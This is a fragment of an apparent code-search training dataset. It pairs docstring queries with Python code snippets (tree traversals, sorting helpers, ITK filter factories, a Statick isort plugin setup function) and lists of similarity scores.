self._timeasc_traversal,\n \"timedesc\": self._timedesc_traversal,\n \"minlex_postorder\": self._minlex_postorder_traversal,\n }\n try:\n iterator = methods[order]\n except KeyError:\n raise ValueError(f\"Traversal ordering '{order}' not supported\")\n\n root = -1 if root is None else root\n return iterator(root)", "def pre_order_traversal(self, root):\n\n def pre_order_traversal_helper(root):\n if root:\n result.append(root.data)\n pre_order_traversal_helper(root.left)\n pre_order_traversal_helper(root.right)\n\n result = []\n pre_order_traversal_helper(root)\n return result", "def test_left_rotation_three_node_tree_including_root():\n from bbst import Bst\n tree = Bst([3, 4, 5])\n assert tuple(tree.in_order()) == (3, 4, 5)\n assert tuple(tree.breadth_first()) == (4, 3, 5)\n assert tuple(tree.pre_order()) == (4, 3, 5)\n assert tuple(tree.post_order()) == (3, 5, 4)\n assert tree.depth() == 2\n assert tree.balance() == 0", "def setUp(self):\n\n self.root = TreeNode(1)\n\n inorderL= [3,2,5,4]\n preorderL = [2,3,4,5]\n left_subtree = Tree.from_inorder_preorder(inorderL, preorderL)\n\n inorderR = [4,5,2,3]\n preorderR = [2,4,5,3]\n right_subtree = Tree.from_inorder_preorder(inorderR, preorderR)\n\n self.root.left = left_subtree.root\n self.root.right = right_subtree.root\n\n tree = Tree(self.root)", "def binary_tree(length, depth):\n if depth == 0:\n return # base case\n posx = turtle.xcor()\n posy = turtle.ycor()\n left(length, depth)\n turtle.up()\n turtle.goto(posx, posy)\n #turtle.dot()\n turtle.down()\n right(length, depth)", "def recoverTree(self, root: TreeNode) -> None:\n def inorder(root):\n if not root:\n return\n inorder(root.left)\n if self.secondNode:\n return\n elif not self.firstNode and self.preNode.val > root.val:\n self.firstNode = self.preNode\n self.firstNodeNext = root\n elif self.firstNode and self.preNode.val > root.val:\n self.secondNode = root\n self.preNode = root\n inorder(root.right)\n\n inorder(root)\n if not self.secondNode:\n self.firstNode.val, self.firstNodeNext.val = self.firstNodeNext.val, self.firstNode.val\n else:\n self.firstNode.val, self.secondNode.val = self.secondNode.val, self.firstNode.val", "def _gen_test_tree_3():\n tree = BinaryNode(5)\n tree.left = BinaryNode(1)\n tree.left.left = BinaryNode(2)\n tree.left.right = BinaryNode(3)\n tree.right = BinaryNode(7)\n tree.right.left = BinaryNode(8)\n tree.right.right = BinaryNode(9)\n return tree", "def postorder(self, root_node):\r\n # Cf. Zhang & Shasha:p.1249:\r\n # \"Let T[I] be the ith node in the tree according to the left-to-right\r\n # postordering\" \r\n tmp = []\r\n if not root_node.is_leaf():\r\n for node in root_node:\r\n tmp2 = self.postorder(node)\r\n if type(tmp2) is list:\r\n tmp.extend(tmp2)\r\n else:\r\n tmp.append(tmp2)\r\n tmp.append(root_node)\r\n return tmp\r\n \r\n else:\r\n return root_node", "def _subtree_postorder(self, p):\n for c in self.children(p): # for each child c\n for other in self._subtree_postorder(c): # do postorder of c's subtree\n yield other # yielding each to our caller\n yield p # visit p after its subtrees", "def _subtree_inorder(self, p):\n if self.left(p) is not None: # if left child exists, traverse its subtree\n for other in self._subtree_inorder(self.left(p)):\n yield other\n yield p # visit p between its subtrees\n if self.right(p) is not None: # if right child exists, traverse its subtree\n for other in self._subtree_inorder(self.right(p)):\n yield other", "def test_post_order_0_1(bst_balanced):\n assert tuple(bst_balanced.post_order()) == (1, 3, 2, 7, 6, 5)", "def _gen_test_tree_2():\n tree = BinaryNode(5)\n tree.left = BinaryNode(3)\n tree.left.left = BinaryNode(2)\n tree.left.left.left = BinaryNode(1)\n tree.left.right = BinaryNode(4)\n tree.right = BinaryNode(7)\n tree.right.left = BinaryNode(6)\n tree.right.right = BinaryNode(8)\n tree.right.right.right = BinaryNode(9)\n return tree" ]
[ "0.6668872", "0.6449099", "0.6396742", "0.6088152", "0.60584265", "0.5841729", "0.57979167", "0.5787835", "0.5776373", "0.5711486", "0.55507797", "0.5525655", "0.5513274", "0.5498472", "0.54892987", "0.5478768", "0.54738367", "0.5418973", "0.53901404", "0.53882676", "0.53662634", "0.5342413", "0.53129363", "0.5307645", "0.53002566", "0.52778006", "0.5276526", "0.52742505", "0.5267223", "0.52619344", "0.5256699", "0.525214", "0.52471745", "0.5218045", "0.5189556", "0.51613355", "0.51606935", "0.5159243", "0.5152476", "0.51502454", "0.5139615", "0.5134672", "0.5130151", "0.511474", "0.50898105", "0.5084526", "0.5071188", "0.5070198", "0.5063434", "0.5061202", "0.5058596", "0.5056264", "0.5053817", "0.5042791", "0.5039743", "0.50396085", "0.50377923", "0.50369984", "0.50297236", "0.5029424", "0.50279623", "0.501718", "0.50095737", "0.5008648", "0.50085276", "0.50031984", "0.49951258", "0.49948177", "0.4983731", "0.4978334", "0.49774358", "0.49702522", "0.49635985", "0.49528202", "0.49493456", "0.49330896", "0.4932132", "0.49298346", "0.49250847", "0.4911891", "0.49030218", "0.48867628", "0.4885733", "0.48840854", "0.4878112", "0.48745412", "0.48718113", "0.4868945", "0.4867292", "0.4863488", "0.4861946", "0.48605302", "0.48585838", "0.4858436", "0.48547605", "0.48466766", "0.4830053", "0.48270053", "0.48247617", "0.4824063" ]
0.66620654
1
Create and return an instance of the Isort plugin.
def setup_isort_tool_plugin(custom_rsc_path=None): arg_parser = argparse.ArgumentParser() if custom_rsc_path is not None: resources = Resources([custom_rsc_path]) else: resources = Resources( [os.path.join(os.path.dirname(statick_tool.__file__), "plugins")] ) config = Config(resources.get_file("config.yaml")) plugin_context = PluginContext(arg_parser.parse_args([]), resources, config) plugin_context.args.output_directory = os.path.dirname(__file__) itp = IsortToolPlugin() itp.set_plugin_context(plugin_context) return itp
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sorter(Plugin):\n return Plugin.order", "def create_plugin(self, **kwargs):\n return self.plugin_class(**kwargs)", "def new(self, sort, properties=None):\n if sort is None:\n sort = UNKNOWNSORT\n # find next available vid\n vid, index = self.vid, self.index\n while vid in index:\n vid += 1\n varstring = '{}{}'.format(sort, vid)\n index[vid] = varstring\n if properties is None:\n properties = []\n self.store[varstring] = properties\n self.vid = vid + 1\n return (varstring, properties)", "def create_r2plugin(self, **kwargs):\n return self.create_tool(cls=R2Plugin, **kwargs)", "def classFactory(iface):\n from .plugin_builder import PluginBuilder\n return PluginBuilder(iface)", "def classFactory(iface): # pylint: disable=invalid-name\n #\n from .iso4app import MainPlugin\n return MainPlugin(iface)", "def getInstance(config):\n return Plugin(config)", "def getInstance(config):\n return Plugin(config)", "def __init__(\n self,\n plugin_id,\n plugin_name,\n plugin_description,\n plugin_instance,\n plugin_enabled_by_default,\n plugin_version,\n plugin_interface_version,\n instance_file_name,\n plugin_url,\n plugin_configuration,\n ):\n (\n self.__plugin_id,\n self.__plugin_names,\n self.__plugin_description,\n self.__plugin_instance,\n self.__plugin_enabled_by_default,\n self.__plugin_version,\n self.__plugin_interface_version,\n self.__plugin_file_name,\n self.__plugin_url,\n self.__plugin_configuration,\n ) = (\n plugin_id.strip().lower(),\n [],\n plugin_description,\n plugin_instance,\n plugin_enabled_by_default,\n plugin_version,\n plugin_interface_version,\n instance_file_name,\n plugin_url,\n plugin_configuration,\n )\n for next_name in plugin_name.lower().split(\",\"):\n next_name = next_name.strip()\n if next_name:\n self.__plugin_names.append(next_name)", "def __new__(mcls, name, bases, namespace): # @NoSelf - 'mcls' is SortinfoMeta, 'cls' is the new class\n # Check that the namespace is compliant\n if '__slots__' not in namespace:\n raise PydmrsError('Subclasses of Sortinfo must define __slots__')\n if 'features' in namespace:\n raise PydmrsError(\"Subclasses of Sortinfo must not define a 'features' attribute\")\n \n # Force all feature names to be lowercase\n namespace['__slots__'] = tuple(feat.lower() for feat in namespace['__slots__'])\n \n # Create the class, and add the 'features' attribute\n cls = super().__new__(mcls, name, bases, namespace)\n cls.features = tuple(chain.from_iterable(getattr(parent, '__slots__', ())\n for parent in reversed(cls.__mro__)))\n \n # Sortinfo defines a from_normalised_dict method which calls either EventSortinfo or InstanceSortinfo\n # Subclasses need to override this method\n if 'from_normalised_dict' not in namespace:\n cls.from_normalised_dict = cls._from_normalised_dict\n \n return cls", "def test_isort_tool_plugin_found():\n if sys.version_info.major == 3 and sys.version_info.minor < 6:\n pytest.skip(\"isort is only available for Python 3.6+, unable to test\")\n manager = PluginManager()\n # Get the path to statick_tool/__init__.py, get the directory part, and\n # add 'plugins' to that to get the standard plugins dir\n manager.setPluginPlaces(\n [os.path.join(os.path.dirname(statick_tool.__file__), \"plugins\")]\n )\n manager.setCategoriesFilter(\n {\n \"Tool\": ToolPlugin,\n }\n )\n manager.collectPlugins()\n # Verify that a plugin's get_name() function returns \"isort\"\n assert any(\n plugin_info.plugin_object.get_name() == \"isort\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )\n # While we're at it, verify that a plugin is named Isort Tool Plugin\n assert any(\n plugin_info.name == \"Isort Tool Plugin\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )", "def new(self, plugin, *args, **kwargs):\n if plugin in self.modules.keys():\n return self.modules[plugin](*args, **kwargs)", "def classFactory(iface): # pylint: disable=invalid-name\n #\n from .CCD_Plugin import CCD_Plugin\n return CCD_Plugin(iface)", "def sortby(self):\n ...", "def classFactory(iface): # pylint: disable=invalid-name\n #\n from .eco_valuator import EcoValuatorPlugin\n return EcoValuatorPlugin()", "def _make_sorter(self, ax):\n np_array = ax.get_values()\n # return np_array.argsort()\n # ax = ax.take(indexer)\n sorter = RocRadixSortDriver()\n sorted_array, indices = sorter.sort_with_indices(np_array)\n return sorted_array, indices", "def uctt_plugin_factory_cli_info(\n environment: Environment, instance_id: str = ''):\n return InfoCliPlugin(environment, instance_id)", "def __init__(self, new_sorts, supersorts):\n global crt_sorts\n crt_sorts = new_sorts\n \n super(SortDecl, self).__init__()\n self.new_sorts = new_sorts\n self.supersorts = supersorts", "def __init__(self, ItemComparer):\n self.item_comparer = ItemComparer", "def __init__(self,\r\n n,\r\n sort,\r\n algo,\r\n comps,\r\n exs,\r\n predata,\r\n postdata,\r\n comp_eq,\r\n ex_eq,\r\n time):\r\n self.n = n\r\n self.sort = sort\r\n self.algo = algo\r\n self.comps = comps\r\n self.exs = exs\r\n self.predata = predata\r\n self.postdata = postdata\r\n self.comp_eq = comp_eq\r\n self.ex_eq = ex_eq\r\n self.time = time", "def get_plugin_interface(self):", "def __init__(self, data, draw, speed):\n self.heap_sort(data, draw, speed)", "def create_cutter_plugin():\n return CutterCovPlugin()", "def plugin_instance(self):\n return self.__plugin_instance", "def sort(self, *args, **kwargs) -> \"Actions\":\n self.actions.sort(*args, **kwargs)\n return self", "def uctt_plugin_factory_cli_environment(\n environment: Environment, instance_id: str = ''):\n return EnvironmentCliPlugin(environment, instance_id)", "def _init_sorted_slice(self, *args, **kwargs): # real signature unknown\n pass", "def uctt_plugin_factory_cli_config(\n environment: Environment, instance_id: str = ''):\n return ConfigCliPlugin(environment, instance_id)", "def __init__(self, new_sorts, supersorts):\r\n global crt_sorts\r\n crt_sorts = new_sorts\r\n \r\n super(SortDecl, self).__init__()\r\n self.new_sorts = new_sorts\r\n self.supersorts = supersorts", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHDIF3_Superclass.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def uctt_plugin_factory_output_config(\n environment: Environment, instance_id: str = ''):\n return OutputCliPlugin(environment, instance_id)", "def main(args):\n\tunsorted_array = []\n\n\tif args.order == 'ASC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\n\tif args.order == 'DESC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tunsorted_array = list(reversed(unsorted_array))\n\n\tif args.order == 'RAND':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tnp.random.shuffle(unsorted_array)\n\n\tsize = int(args.instancesize)\n\n\tif args.algorithm == 'all':\n\t\tselection_sort(unsorted_array, size)\n\t\tinsertion_sort(unsorted_array, size)\n\t\tshell_sort(unsorted_array, size)\n\t\tmerge_sort(unsorted_array, size)\n\t\theap_sort(unsorted_array, size)\n\t\tquick_sort(unsorted_array, size)\n\n\tif args.algorithm == 'selection':\n\t\tselection_sort(unsorted_array, size)\n\n\tif args.algorithm == 'insertion':\n\t\tinsertion_sort(unsorted_array, size)\n\n\tif args.algorithm == 'shell':\n\t\tshell_sort(unsorted_array, size)\n\n\tif args.algorithm == 'merge':\n\t\tmerge_sort(unsorted_array, size)\n\n\tif args.algorithm == 'heap':\n\t\theap_sort(unsorted_array, size)\n\n\tif args.algorithm == 'quick':\n\t\tquick_sort(unsorted_array, size)", "def __init__(\n self,\n github: instarepo.github.GitHub,\n sort: str,\n direction: str,\n archived: FilterMode,\n forks: FilterMode,\n repo_prefix: StringFilter,\n language: StringFilter,\n pushed_after,\n pushed_before,\n ):\n self.github = github\n self.sort = sort\n self.direction = direction\n self.archived = archived\n self.forks = forks\n self.repo_prefix = repo_prefix\n self.language = language\n self.pushed_after = pushed_after\n self.pushed_before = pushed_before", "def sortInterfaces(self, sort = \"order\", translation = 0, opt = None, rev = False,\\\n ab = False):\n\n if ab:\n if self.getAB()[0] is None:\n string = \"No alternative base defined\"\n ut.infoPrint(string)\n return\n else:\n ab = 0\n else:\n ab = []\n \n data = self.getData(var = sort, ab = ab, translation = translation)[0]\n if data == []: return\n\n si = np.argsort(data[0])\n\n if rev:\n si = si[::-1]\n\n self.indexSortInterfaces(index = si)", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHDIF3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def __init__(self,\n runscontainer,\n sort_table_by,\n threshold=0.05):\n super().__init__(runscontainer)\n\n self.sort_table_by = sort_table_by\n self.threshold = threshold", "def uctt_plugin_factory_cli_fixtures(\n environment: Environment, instance_id: str = ''):\n return FixturesCliPlugin(environment, instance_id)", "def create_runner(self) -> PluginsRunner:\n return PluginsRunner(\n self.workflow,\n self.workflow.plugins_conf,\n plugins_results=self.workflow.data.plugins_results,\n )", "def get_sort_query(self, kind, order, is_number):\n pass", "def __init__(__self__, *,\n description: Optional[pulumi.Input[str]] = None,\n filters: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n order: Optional[pulumi.Input[int]] = None,\n predicates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n sso_enabled: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n title: Optional[pulumi.Input[str]] = None,\n token_relay: Optional[pulumi.Input[bool]] = None,\n uri: Optional[pulumi.Input[str]] = None):\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if filters is not None:\n pulumi.set(__self__, \"filters\", filters)\n if order is not None:\n pulumi.set(__self__, \"order\", order)\n if predicates is not None:\n pulumi.set(__self__, \"predicates\", predicates)\n if sso_enabled is not None:\n pulumi.set(__self__, \"sso_enabled\", sso_enabled)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if title is not None:\n pulumi.set(__self__, \"title\", title)\n if token_relay is not None:\n pulumi.set(__self__, \"token_relay\", token_relay)\n if uri is not None:\n pulumi.set(__self__, \"uri\", uri)", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHFIF3_Superclass.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHDIF2_Superclass.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def yicesSort(self, name):\n name = str(name)\n try:\n return self._yicesSort[name]\n except KeyError:\n sort = yicespy.yices_new_uninterpreted_type()\n self._yicesSort[name] = sort\n return sort", "def oldsortslice(self):\n ...", "def sort(self, pivot='rand'):\n\n choices = ('first', 'median', 'last', 'rand')\n assert pivot in choices\n self.choice = pivot\n return self._recursiveSort(self.obj)", "def add_sort_filter(source, args, index):\n tags = hxl.TagPattern.parse_list(args.get('sort-tags%02d' % index, ''))\n reverse = (args.get('sort-reverse%02d' % index) == 'on')\n return source.sort(tags, reverse)", "def uctt_plugin_factory_provisioner_config(\n environment: Environment, instance_id: str = ''):\n return ProvisionerCliPlugin(environment, instance_id)", "def pluginable(cls):\n # store the functions with the same name\n # that defined by different plugins\n # Note that current (most recently added) is not in the stack\n cls._plugin_stacks = {}\n\n def _original(self, fname):\n \"\"\"Get the original function of self, if it is overridden\"\"\"\n # callframe is oringally -1\n frame = self._plugin_callframe.setdefault(fname, -1)\n frame += 1\n self._plugin_callframe[fname] = frame\n # print(cls._plugin_stacks)\n return cls._plugin_stacks[fname][frame]\n\n cls._original = _original\n\n orig_init = cls.__init__\n\n def __init__(self, *args, **kwargs):\n self._plugin_callframe = {}\n orig_init(self, *args, **kwargs)\n\n cls.__init__ = __init__\n\n if cls.__name__ == \"CmdyHolding\":\n orig_reset = cls.reset\n\n @wraps(orig_reset)\n def reset(self, *args, **kwargs):\n # clear the callframes as well\n self._plugin_callframe = {}\n orig_reset(self, *args, **kwargs)\n return self\n\n cls.reset = reset\n\n return cls", "def sort(self, *args: Any, **kwargs: Any) -> BaseList:\n super().sort(*args, **kwargs)\n return self", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHDIF2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def sorted(self): \n pass", "def classFactory(iface):\n from qgbif.qgbif import QGBIFPlugin\n return QGBIFPlugin(iface)", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHFIF3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def __init__(\n self,\n name: SortDirection = None\n ):\n\n self.__name = name", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterIUL3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def create_plugin_manager():\n plugin_manager = PiPluginManager(hookspecs.hookspec.project_name)\n plugin_manager.add_hookspecs(hookspecs)\n return plugin_manager", "def indexSortInterfaces(self, index):\n\n self.cell_1 = self.cell_1[index]\n self.cell_2 = self.cell_2[index]\n self.rep_1 = self.rep_1[index]\n self.rep_2 = self.rep_2[index]\n\n self.eps_11 = self.eps_11[index]\n self.eps_22 = self.eps_22[index]\n self.eps_12 = self.eps_12[index]\n self.eps_mas = self.eps_mas[index]\n\n self.atoms = self.atoms[index]\n self.ang = self.ang[index]\n self.e_int_c = self.e_int_c[index]\n self.w_sep_c = self.w_sep_c[index]\n self.w_seps_c = self.w_seps_c[index]\n\n self.e_int_d = self.e_int_d[index]\n self.w_sep_d = self.w_sep_d[index]\n self.w_seps_d = self.w_seps_d[index]\n \n self.order = self.order[index]", "def topsort(self, *start, endpoints=()):\n return TopologicalSorter(self, start, endpoints)", "def classFactory(iface):\n from .os_translator_ii import OsTranslatorII\n return OsTranslatorII(iface)", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterID3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def load_plugin():\n return HostTestPluginCopyMethod_Shell()", "def create(cls, beam_elements):\r\n if str(type(beam_elements)) == \"<class 'fconcrete.Structural.BeamElement.BeamElements'>\": return beam_elements\r\n beam_elements = np.array(beam_elements)\r\n x_start = np.array([ beam_element.n1.x for beam_element in beam_elements ])\r\n bar_sort_position = np.argsort(x_start)\r\n return cls(beam_elements[bar_sort_position])", "def New(*args, **kargs):\n obj = itkHalfHermitianToRealInverseFFTImageFilterICF3IF3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterIF3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def sort(self, sort):\n\n self._sort = sort", "def __init__(self, *args, **kwargs):\n super(PokedexPlugin, self).__init__(*args, **kwargs)\n\n # XXX should we really be doing this here?\n h.pokedex = pokedex_helpers", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterIUL2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def custom_sort(arr):\n pass", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHFIF2_Superclass.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def test_parse_sort(self):\n old_type = Sort('sort', [\n Relationship('student', PersonSchema(), None),\n Relationship('school', StudentSchema(), None)],\n Attribute('title', SchoolSchema(), None), '+')\n new_type = self.driver.parse(old_type)\n\n assert new_type.source == old_type\n assert old_type.relationships != new_type.relationships\n assert isinstance(new_type.relationships[0], Mapper)\n assert old_type.attribute != new_type.attribute\n assert isinstance(new_type.attribute, Column)\n assert old_type.direction == new_type.direction", "def __init__(self, algorithm, list = None, size = 10, unique = True,\n comp = True, swap = True, trace = False):\n self._list = list\n self._size = size\n self._unique = unique\n self._comp = comp\n self._swap = swap\n self._trace = trace\n self._swap_count = 0\n self._comp_count = 0\n self._algorithm = algorithm\n self._start = 0\n self._elapsed_time = 0", "def test_insertSort(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_1[0]),self.test_1[1])", "def _new_instance(self):\n return self.__class__(self._vmodule)", "def __init__(self):\n self.data = SortedList()", "def __init__(self):\n\n self.plugin_name = 'Yum'", "def instantiateNewCmd(self):\n return QadGRIPSTRETCHCommandClass(self.plugIn)", "def classFactory(iface): # pylint: disable=invalid-name\n #\n from .quick_digitize import QuickDigitize\n return QuickDigitize(iface)", "def plugin_import(plugin):\n\n return importlib.import_module(plugin, package=\"directord\")", "def New(*args, **kargs):\n obj = itkHalfHermitianToRealInverseFFTImageFilterICF2IF2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def test_insertSort3(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_3[0]),self.test_3[1])", "def create_api(self):\n return DJinnAPI(djenkins=self.dj, pipeline_results=self.db)", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterIF2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def __init__(self, compare=cmp):\n self.compare = compare\n self.array = []\n self.pos = {}", "def __init__(\n self,\n label : str,\n debug : bool = False,\n **kw\n ):\n super().__init__('plugin', label=label, **kw)\n\n import os, pathlib, sys\n from meerschaum.utils.warnings import error, warn\n from meerschaum.config._paths import PLUGINS_RESOURCES_PATH\n if str(PLUGINS_RESOURCES_PATH.parent) not in sys.path:\n sys.path.append(str(PLUGINS_RESOURCES_PATH.parent))\n\n self.resource_path = None\n for _plugin in os.listdir(PLUGINS_RESOURCES_PATH):\n plugin = _plugin.replace('.py', '')\n if plugin == self.label:\n self.resource_path = pathlib.Path(os.path.join(PLUGINS_RESOURCES_PATH, plugin))\n break\n if not self.resource_path:\n error(f\"Plugin '{self.label}' cannot be found. Is it installed?\")\n\n self.fetch = None\n try:\n exec(f'from plugins.{self.label} import fetch; self.fetch = fetch')\n except Exception as e:\n pass\n\n self.sync = None\n try:\n exec(f'from plugins.{self.label} import sync; self.sync = sync')\n except Exception as e:\n pass\n\n if self.fetch is None and self.sync is None:\n error(f\"Could not import `fetch()` or `sync()` methods for plugin '{self.label}'\")", "def __init__(self, *args):\n this = _libsbml.new_CompSBasePlugin(*args)\n try: self.this.append(this)\n except: self.this = this", "def plugin_class() -> Type[\"NitpickPlugin\"]:\n return TextPlugin", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHFIF2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def insertion_sort(array, method='forloop'):\n return METHODS[method](array)", "def _new_instance(self):\n return self.__class__(self._vmodule, self._tensor_rank)", "def construct_sort_part(\n model_cls: Type[Model],\n part: str,\n case_insensitive: bool = True,\n) -> Sort:\n assert part, \"part must be a field name and + or -\"\n field = part[:-1]\n assert field, \"field is missing\"\n direction = part[-1]\n assert direction in ('+', '-'), \"part must end with + or -\"\n is_ascending = direction == '+'\n\n if field in model_cls._sorts:\n sort = model_cls._sorts[field](model_cls, is_ascending,\n case_insensitive)\n elif field in model_cls._fields:\n sort = query.FixedFieldSort(field, is_ascending, case_insensitive)\n else:\n # Flexible or computed.\n sort = query.SlowFieldSort(field, is_ascending, case_insensitive)\n return sort", "def __init__(self, input=None, ij=None, order=None, max_order=10,\r\n criterion=utils.bayesian_information_criterion, n_freqs=1024):\r\n self.data = input.data\r\n self.sampling_rate = input.sampling_rate\r\n self._n_process = input.shape[0]\r\n self._n_freqs = n_freqs\r\n self._order = order\r\n self._criterion = criterion\r\n self._max_order = max_order\r\n if ij is None:\r\n # The following gets the full list of combinations of\r\n # non-same i's and j's:\r\n x, y = np.meshgrid(np.arange(self._n_process),\r\n np.arange(self._n_process))\r\n self.ij = list(zip(x[tril_indices_from(x, -1)],\r\n y[tril_indices_from(y, -1)]))\r\n else:\r\n self.ij = ij", "def __init__(self, webif_dir, plugin):\n #self.logger = logging.getLogger(__name__)\n self.logger = plugin.logger\n self.webif_dir = webif_dir\n self.plugin = plugin\n self.tplenv = self.init_template_environment()", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterID2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def test_insertSort2(self):\n\t\tsortObj=insertSort()\n\t\tself.assertNotEqual(sortObj.run_sort(self.test_2[0]),self.test_2[1])", "def handle_coreutils_sort_kwargs(self, prog='sort', instream=None, **kwargs):\n pybedtools.logger.debug(\n 'BedTool.handle_coreutils_sort_kwargs() got these kwargs:\\n%s',\n pprint.pformat(kwargs))\n\n stdin = None\n\n # Decide how to send instream to sort.\n # If it's a BedTool, then get underlying stream\n if isinstance(instream, BedTool):\n instream = instream.fn\n\n # Filename? No pipe, just provide the file\n if isinstance(instream, six.string_types):\n stdin = None\n input_fn = instream\n # A generator or iterator: pipe it as a generator of lines\n else:\n stdin = (str(i) for i in instream)\n input_fn = '-'\n\n # If stream not specified, then a tempfile will be created\n if kwargs.pop('stream', None):\n tmp = None\n else:\n output = kwargs.pop('output', None)\n if output:\n tmp = output\n else:\n tmp = BedTool._tmp()\n\n additional_args = kwargs.pop('additional_args', None)\n\n # Parse the kwargs into BEDTools-ready args\n cmds = [prog]\n\n for key, value in sorted(list(kwargs.items()), reverse=True):\n if isinstance(value, bool):\n if value:\n cmds.append('--' + key)\n else:\n continue\n elif isinstance(value, list) or isinstance(value, tuple):\n value = list(map(str, value))\n\n # sort --key 1,1 --key 2,2r -k 5,5\n for val in value:\n if len(key) == 1:\n cmds.append('-' + key)\n else:\n cmds.append('--' + key)\n cmds.append(str(val))\n else:\n cmds.append('--' + key)\n cmds.append(str(value))\n\n if additional_args:\n cmds.append(additional_args)\n\n cmds.append(input_fn)\n return cmds, tmp, stdin", "def __init__(self):\n self._keys = []\n self._sortKeys = []", "def sort(self, exprs):\n self._sort_exprs = exprs\n return self", "def New(*args, **kargs):\n obj = itkHuangThresholdImageFilterISS3ISS3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def create_parser():\n now = datetime.datetime.today()\n default_date = \"{}-{}-{}\".format(now.day, now.month, now.year)\n parser = argparse.ArgumentParser(description=\"Git plugin for automatic insertion of @since and @author annotations \"\n \"into *.java source files in a project.\",\n epilog=\"© Avner & Oded\")\n parser.add_argument(\"-v\", \"--version\", help=\"Display the version of this plugin\", action='store_true')\n parser.add_argument(\"--since\", nargs='?', help=\"Add the @since annotations to project\", const=default_date)\n parser.add_argument(\"--author\", nargs='?', help=\"Add the @author annotations to project\", const=getpass.getuser())\n\n return parser", "def __init__(self, webif_dir, plugin):\n self.logger = plugin.logger\n self.webif_dir = webif_dir\n self.plugin = plugin\n self._creds = None\n self._auth = None\n\n self.tplenv = self.init_template_environment()" ]
[ "0.5880008", "0.572811", "0.5263633", "0.5135936", "0.5086754", "0.5085847", "0.5052518", "0.5052518", "0.5028125", "0.5018764", "0.5011754", "0.49714696", "0.49462602", "0.48368236", "0.48352364", "0.4823109", "0.48152107", "0.48114508", "0.48113042", "0.479689", "0.47876537", "0.47851378", "0.47843146", "0.47635952", "0.4755802", "0.47509703", "0.4749833", "0.47206005", "0.4680351", "0.46746126", "0.46631837", "0.46548966", "0.46344376", "0.46238235", "0.4620496", "0.46195126", "0.46092921", "0.45940942", "0.4546308", "0.45396274", "0.45371294", "0.4534121", "0.45319805", "0.45319173", "0.4526805", "0.45143154", "0.45140886", "0.45009172", "0.4487294", "0.4486419", "0.44699883", "0.44635287", "0.4462118", "0.4461933", "0.44563553", "0.44478616", "0.44462118", "0.44459984", "0.4443109", "0.44430462", "0.44356376", "0.4428438", "0.44216046", "0.4420869", "0.4404056", "0.43998334", "0.43963715", "0.43947834", "0.43944824", "0.4392197", "0.43864635", "0.4383929", "0.43772188", "0.43746927", "0.43742737", "0.43675026", "0.43667853", "0.4363298", "0.43606964", "0.43528897", "0.43522048", "0.43406022", "0.43341544", "0.43328393", "0.4324247", "0.432101", "0.4309011", "0.43078488", "0.43075755", "0.43074673", "0.43072623", "0.42945528", "0.4293544", "0.42897135", "0.42888305", "0.42793787", "0.4276515", "0.42762154", "0.42708898", "0.4267183" ]
0.59617186
0
Test that the plugin manager can find the Isort plugin.
